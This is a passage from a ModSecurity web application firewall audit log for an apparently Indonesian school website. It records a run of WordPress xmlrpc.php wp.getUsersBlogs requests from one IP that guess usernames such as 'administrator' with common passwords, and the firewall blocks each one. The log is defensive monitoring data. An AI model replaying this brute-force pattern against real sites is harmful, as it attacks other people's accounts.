"240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (153+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777795065801 4478 (- - -) Stopwatch2: 1744777795065801 4478; combined=3335, p1=350, p2=2795, p3=0, p4=0, p5=108, sr=81, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99440e7e-Z-- --a043771d-A-- [16/Apr/2025:11:30:55 +0700] Z_8yf0-sESiKFppgz04c9QAAANA 103.236.140.4 38594 103.236.140.4 8181 --a043771d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a043771d-C-- wp.getUsersBlogs kasubagtu asdf --a043771d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a043771d-E-- --a043771d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (142+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777855374686 4308 (- - -) Stopwatch2: 1744777855374686 4308; combined=3284, p1=364, p2=2740, p3=0, p4=0, p5=104, sr=82, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a043771d-Z-- --f4616501-A-- [16/Apr/2025:11:31:31 +0700] Z_8yo0-sESiKFppgz04dDwAAAM8 103.236.140.4 38778 103.236.140.4 8181 --f4616501-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4616501-C-- wp.getUsersBlogs kasubagtu 1234%^&* --f4616501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4616501-E-- --f4616501-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777891578712 6189 (- - -) Stopwatch2: 1744777891578712 6189; combined=4294, p1=562, p2=3564, p3=0, p4=0, p5=102, sr=101, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4616501-Z-- --565f4870-A-- [16/Apr/2025:11:31:55 +0700] Z_8yuype92T0H9-Aa0y87gAAAEU 103.236.140.4 38888 103.236.140.4 8181 --565f4870-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --565f4870-C-- wp.getUsersBlogs kasubagtu Aa123456. --565f4870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --565f4870-E-- --565f4870-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777915309187 4118 (- - -) Stopwatch2: 1744777915309187 4118; combined=3210, p1=377, p2=2669, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --565f4870-Z-- --7fc22051-A-- [16/Apr/2025:11:32:55 +0700] Z_8y95VnVduWmh0dMDMWpwAAAIA 103.236.140.4 39206 103.236.140.4 8181 --7fc22051-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7fc22051-C-- wp.getUsersBlogs kasubagtu evite --7fc22051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fc22051-E-- --7fc22051-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (157+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777975758752 4138 (- - -) Stopwatch2: 1744777975758752 4138; combined=3160, p1=346, p2=2649, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fc22051-Z-- --d4c1ab52-A-- [16/Apr/2025:11:33:55 +0700] Z_8zM0-sESiKFppgz04dLwAAANc 103.236.140.4 39510 103.236.140.4 8181 --d4c1ab52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d4c1ab52-C-- wp.getUsersBlogs kasubagtu manunited --d4c1ab52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4c1ab52-E-- --d4c1ab52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778035870760 4230 (- - -) Stopwatch2: 1744778035870760 4230; combined=3239, p1=346, p2=2728, p3=0, p4=0, p5=96, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4c1ab52-Z-- --010cac48-A-- [16/Apr/2025:11:34:55 +0700] Z_8zb0-sESiKFppgz04dtAAAAM4 103.236.140.4 39802 103.236.140.4 8181 --010cac48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --010cac48-C-- wp.getUsersBlogs administrator administrator1986 --010cac48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --010cac48-E-- --010cac48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (144+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778095180573 4195 (- - -) Stopwatch2: 1744778095180573 4195; combined=3222, p1=340, p2=2715, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --010cac48-Z-- --ccde9100-A-- [16/Apr/2025:11:35:55 +0700] Z_8zqxk9XPLR9cFiTEvD2AAAAAI 103.236.140.4 40080 103.236.140.4 8181 --ccde9100-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ccde9100-C-- wp.getUsersBlogs administrator Marketing_ --ccde9100-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ccde9100-E-- --ccde9100-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778155241224 4341 (- - -) Stopwatch2: 1744778155241224 4341; combined=3318, p1=351, p2=2804, p3=0, p4=0, p5=95, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ccde9100-Z-- --2a390d2a-A-- [16/Apr/2025:11:36:55 +0700] Z_8z50-sESiKFppgz04ejgAAAM4 103.236.140.4 40364 103.236.140.4 8181 --2a390d2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2a390d2a-C-- wp.getUsersBlogs administrator 1201230 --2a390d2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a390d2a-E-- --2a390d2a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778215356559 4090 (- - -) Stopwatch2: 1744778215356559 4090; combined=3149, p1=338, p2=2647, p3=0, p4=0, p5=95, sr=77, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a390d2a-Z-- --800cfa78-A-- [16/Apr/2025:11:37:55 +0700] Z_80I5VnVduWmh0dMDMXUwAAAIQ 103.236.140.4 40648 103.236.140.4 8181 --800cfa78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --800cfa78-C-- wp.getUsersBlogs administrator 12345678910 --800cfa78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --800cfa78-E-- --800cfa78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778275098690 4104 (- - -) Stopwatch2: 1744778275098690 4104; combined=3161, p1=338, p2=2657, p3=0, p4=0, p5=96, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --800cfa78-Z-- --c301395f-A-- [16/Apr/2025:11:38:31 +0700] Z_80R5VnVduWmh0dMDMXfQAAAIA 103.236.140.4 40814 103.236.140.4 8181 --c301395f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c301395f-C-- wp.getUsersBlogs administrator 1234%^&* --c301395f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c301395f-E-- --c301395f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778311247540 4318 (- - -) Stopwatch2: 1744778311247540 4318; combined=3307, p1=345, p2=2796, p3=0, p4=0, p5=98, sr=78, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c301395f-Z-- --69e8a92d-A-- [16/Apr/2025:11:38:55 +0700] Z_80X5VnVduWmh0dMDMXnAAAAIs 103.236.140.4 40934 103.236.140.4 8181 --69e8a92d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --69e8a92d-C-- wp.getUsersBlogs administrator whatever --69e8a92d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69e8a92d-E-- --69e8a92d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (136+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778335122494 16420 (- - -) Stopwatch2: 1744778335122494 16420; combined=27582, p1=357, p2=2708, p3=0, p4=0, p5=12272, sr=80, sw=69, l=0, gc=12176 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e8a92d-Z-- --97966408-A-- [16/Apr/2025:11:39:55 +0700] Z_80m5VnVduWmh0dMDMX4wAAAI0 103.236.140.4 41222 103.236.140.4 8181 --97966408-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --97966408-C-- wp.getUsersBlogs administrator senha --97966408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97966408-E-- --97966408-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778395452429 4417 (- - -) Stopwatch2: 1744778395452429 4417; combined=3364, p1=356, p2=2846, p3=0, p4=0, p5=94, sr=81, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97966408-Z-- --0cf6c574-A-- [16/Apr/2025:11:40:55 +0700] Z_801xk9XPLR9cFiTEvEiwAAABA 103.236.140.4 41472 103.236.140.4 8181 --0cf6c574-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0cf6c574-C-- wp.getUsersBlogs administrator martin --0cf6c574-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cf6c574-E-- --0cf6c574-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (124+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778455602389 4391 (- - -) Stopwatch2: 1744778455602389 4391; combined=3303, p1=340, p2=2795, p3=0, p4=0, p5=98, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cf6c574-Z-- --5cfad657-A-- [16/Apr/2025:11:41:55 +0700] Z_81Exk9XPLR9cFiTEvFFAAAAAk 103.236.140.4 41758 103.236.140.4 8181 --5cfad657-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5cfad657-C-- wp.getUsersBlogs kajur Pakarmy@0882 --5cfad657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cfad657-E-- --5cfad657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778515135332 4289 (- - -) Stopwatch2: 1744778515135332 4289; combined=3249, p1=346, p2=2735, p3=0, p4=0, p5=98, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cfad657-Z-- --bb021b37-A-- [16/Apr/2025:11:42:55 +0700] Z_81Txk9XPLR9cFiTEvFmwAAAAQ 103.236.140.4 42040 103.236.140.4 8181 --bb021b37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bb021b37-C-- wp.getUsersBlogs kajur trustno1 --bb021b37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb021b37-E-- --bb021b37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (136+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778575320732 4264 (- - -) Stopwatch2: 1744778575320732 4264; combined=3243, p1=358, p2=2702, p3=0, p4=0, p5=106, sr=83, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb021b37-Z-- --73262517-A-- [16/Apr/2025:11:43:55 +0700] Z_81i0-sESiKFppgz04fYQAAAMo 103.236.140.4 42340 103.236.140.4 8181 --73262517-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: 